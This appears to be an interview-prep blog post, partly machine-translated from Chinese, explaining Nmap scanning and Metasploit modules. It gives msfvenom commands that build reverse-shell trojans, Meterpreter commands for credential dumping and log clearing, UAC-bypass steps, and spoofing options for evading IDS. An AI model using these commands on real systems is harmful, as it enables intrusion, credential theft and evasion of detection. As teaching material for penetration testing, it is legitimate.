Article directory
Preface
Cybersecurity interview questions
topic
1. Principle, common parameters and principles of NMAP tool
Nmap can detect whether the target machine is online, port openings, running service type and version information, operating system and device type and other information.
Principle:
Nmap is the next open source and free network discovery and security audit tool for Linux. It uses raw IP packets to discover which hosts are on the network, what services (application names and versions) these hosts provide, what operating systems the services are running on, what types of packet filters/firewalls they use, and some other features.
First, let’s introduce the several states of the port.
The six states of
the port are ⚫open: the port is open
⚫closed: the port is closed
⚫filtered: the port is blocked by the firewall IDS/IPS, and its status cannot be determined
⚫unfiltered: the port is not blocked. But whether it is open needs to be further determined
⚫open|filtered: the port is open or blocked
⚫closed|filtered: the port is closed or blocked
Commonly used parameters and principles:
-sP/-sn:Ping扫描(不进行端口扫描)
-p:指定扫描的目标端口
-sT/-sS/-sA:TCP connect/TCP SYN/TCP ACK扫描
-sU:UDP扫描
-O:操作系统侦测
-sV:应用程序版本探测
-Pn: 将所有指定的主机视作开启的,跳过主机发现的过程
--dns-servers <serv1[,serv2],...>: 指定DNS服务器。
--system-dns: 指定使用系统的DNS服务器
--traceroute: 追踪每个路由节点
--packet-trace 追踪包
TCP SYN principle analysis:
nmap -p 80 -sS [靶机IP]
Nmap sends a TCP SYN message to the target port. If the target machine returns a TCP SYN+ACK message, it means that the target port is open. At the same time, Nmap will then send a TCP RST message to the target machine to reset the connection; if the target machine If the machine returns a TCP RST+ACK message, it means that the target port is closed.
TCP connect principle analysis:
nmap -p 80 -sT [靶机IP]
Nmap sends a TCP SYN message to the target port. If the target machine returns a TCP SYN+ACK message, it means that the target port is open. At the same time, Nmap will then send TCP ACK and TCP RST+ACK to the target machine in sequence to complete the three-way handshake and Reset this connection; if the target machine returns a TCP RST+ACK message, it means that the target port is closed.
TCP ACK principle analysis:
nmap -p 80 -sA [靶机IP]
Nmap sends a TCP ACK message to the target port. Regardless of whether the target port is open or not, the target machine will return a TCP RST message. If the Nmap host can receive this TCP RST message, it means that the target port is not blocked by the firewall.
TCP ACK scanning can only be used to determine whether the firewall blocks a certain port. It can assist TCP SYN to determine the status of the target host's firewall.
Other functions:
Avoid FW/ID technology
-T(0-5): control the speed of scanning (0=slowest, 5=fastest)
nmap -T 3 x.x.x.x
-D : Source IP address (use any fake IP) spoofed.
nmap -D RND:3 x.x.x.x 随机三个假IP去扫描
-sI: Select an idle IP in the same network segment as the source IP to scan – source IP spoofing.
nmap -sI 空闲IP x.x.x.x
–source-port source port spoofing
–spoof-mac source mac spoofing
nmap --spoof-mac 0 x.x.x.x 随机MAC去扫描
nmap --spoof-mac aa:bb:cc:dd:ff:ee x.x.x.x 指定MAC扫描
nmap calls NSE script application.
Script storage directory: /usr/share/nmap/scripts/
—Parameters: –script
–script vuln Scan for common vulnerabilities
nmap --script vuln x.x.x.x
–script brute simple brute force cracking of database, smb, snmp
nmap --script brute x.x.x.x
2. Commonly used modules and commands of Metasploit
➢exploits (Penetration Attack/Vulnerability Exploitation Module)
⚫Penetration attack module is a code component that exploits discovered security vulnerabilities or configuration weaknesses to attack remote targets to implant and run attack payloads to gain access to remote target systems. Popular penetration attack techniques include buffer overflow, web application vulnerability attacks, user configuration errors, etc., which include various POC verification programs designed by attackers or testers to target vulnerabilities in the system, as well as those used to undermine system security. Attack code, each vulnerability has a corresponding attack code.
⚫The penetration attack module is the core functional component of the Metasploit framework
➢payloads (attack load module)
⚫The attack payload is the code that we expect the target system to complete the actual attack function after being penetrated. After successfully penetrating the target, it is used to run arbitrary commands or execute specific code on the target system.
⚫The attack load module ranges from the simplest adding a user account and providing a command line shell, to the graphical VNC interface control, and the most complex Meterpreter with a large number of post-penetration attack phase features, which allows penetration attackers to select After penetrating the attack code, he selects his favorite modules from many applicable attack loads and flexibly assembles them, and obtains the control session type of his choice after the penetration attack. This modular design and flexible assembly mode also provide penetration attackers with A great convenience.
➢auxiliary (auxiliary module)
⚫This module will not directly establish access between the tester and the target host. They are only responsible for performing scanning, sniffing, fingerprint recognition and other related functions to assist penetration testing
network host survival scanning, Web directory scanning, FTP login password blasting
For example port scan:
search portscan
use 5 //tcp扫描模块
show options
set RHOSTS x.x.x.x //设置待扫描的IP地址、
set PORTS 1-500 //设置扫描端口范围、
set THREADS 20 //设置扫描线程,线程数量越高,扫描的速度越多
run
➢nops (null instruction module)
⚫Null instructions (NOP) are some no-op or irrelevant operation instructions that do not have any substantial impact on the running status of the program. The most typical null instruction is a null operation, and the opcode on the x86 CPU architecture platform is 0x90.
⚫When constructing an evil data buffer in a penetration attack, it is often necessary to add an empty command area before the actual executed Shellcode. In this way, when a penetration attack is triggered and the shellcode is executed, there will be a larger safe landing zone to avoid shellcode execution failure caused by memory address randomization, return address calculation deviation, etc.
⚫The empty command module in the Matasploit framework is a component used to add an empty command area to the attack payload to improve the reliability of the attack.
➢encoders (encoder module)
⚫The encoder module completes two major tasks by encoding the attack load in various forms: first, ensuring that there are no "bad characters" in the attack load that should be avoided during the penetration attack; The second is to "avoid killing" the attack load, that is, to avoid detection and blocking by anti-virus software and IDS/IPS.
➢post (post-penetration attack module)
⚫The post-penetration attack module is mainly used to carry out various post-penetration attack actions in the controlled system after the penetration attack obtains remote control of the target system, such as obtaining sensitive information and further lateral Expand and implement springboard attacks, etc.
Meterpreter common commands
➢pwd //查看当前工作目录
➢sysinfo //查看系统信息
➢getuid //获取当前权限的用户id
➢ps //查看当前目标机上运行的进程列表和pid
➢kill 2768 //杀死进程(pid)2768
➢getsystem //获取system权限
➢screenshot //截取目标主机当前屏幕
➢hashdump //获取用户名与hash口令
➢shell //获取目标主机shell
➢upload //上传一个文件
➢download //下载一个文件
➢execute //执行目标系统中的文件(-f指定文件,-i执行可交互模式,-H隐藏窗口)
➢clearev //清除日志
➢background //将meterpreter放入后台(使用sessions-i重新连接到会话)
Commonly used commands:
➢Commonly used commands under Terminal
⚫msfdb init //msf数据库初始化
⚫msfdb delete //删除msf数据库并停止使用
⚫msfdb start //启动msf数据库
⚫msfdb stop //停止msf数据库
⚫msfconsole //打开msf终端
➢Common commands under msf terminal
⚫db_status //查看msf数据库连接状态
⚫db_nmap //调用nmap扫描,并将扫描结果存入数据库
⚫search //搜索含有关键字的模块
⚫use //选择使用一个模块
⚫show payload //显示该模块支持的payload
⚫show options //显示该模块需要设置的参数
⚫info //查看详细信息
⚫set //使用模块后,设置模块所需要的参数的值(对应使用unset取消设置的值)
⚫back //返回上级状态
⚫exploit/run //两个命令都表示运行攻击模块
⚫sessions //查看当前连接的会话
When using the penetration module to come to meterpreter,
manually escalate privileges:
put the session in the background and use local_exploit_suggester to query available exploits.
background
use local_exploit_suggester
show options
set session 4
run
bypass_uac (User Account Control) privilege escalation:
search bypassuac
ues exploit/windows/local/bypassuac
set payload windows/x64/meterpreter/reverse_tcp
set session 4
run
Re-process migration:
When the Meterpreter Shell is first obtained, the Shell is extremely fragile and vulnerable to attacks. For example, an attacker can exploit browser vulnerabilities to compromise the target machine, but the browser may be closed by the user after the attack penetrates. So the first step is to move this shell and bind it to a stable process on the target machine without any writing operations to the disk. Doing so makes penetration harder to detect.
After using the automatic migration process command (run post/windows/manage/migrate), the system will automatically find the appropriate process and migrate it1
run post/windows/manage/migrate
Msfvenom (Venom) makes a Trojan and monitors its launch:
Trojan generation method:
win64 system:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f exe > shell.exe.
win32 system:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -a x86 --platform Windows -f exe > shell.exe
Linux system:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f elf > shell.elf
MacOS:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxx -f macho > shell.macho
Upload the Trojan to the target host:
#msfconsole
use exploit/multi/handler //Load module
set payload android/meterpreter/reverse_tcp //Select Payload
show options //View parameter settings
set LHOST xxxx //The address here is set to the one we just generated Trojan's IP address (kali's ip)
set LPORT xxx //The port here is set to the port we just generated the Trojan to listen to
exploit //Start executing the vulnerability, start monitoring, and wait for online
➢evasion (evasion module)
⚫The evasion module is mainly used to circumvent the inspection of Windows Defender Firewall, Windows Application Control Policy (applocker), etc.
The general process of using Metasploit for penetration testing
1. Scan the target system to find available vulnerabilities
2. Select and configure a penetration attack (exploit) module (exploits)
3. Select and configure an attack load module (payloads)
4. Choose one An encoding technology (encoders) used to bypass the detection and killing of anti-virus software
5. Perform the post-penetration phase of the penetration attack
Summarize
This issue mainly introduces the relevant knowledge of nmap and metasploit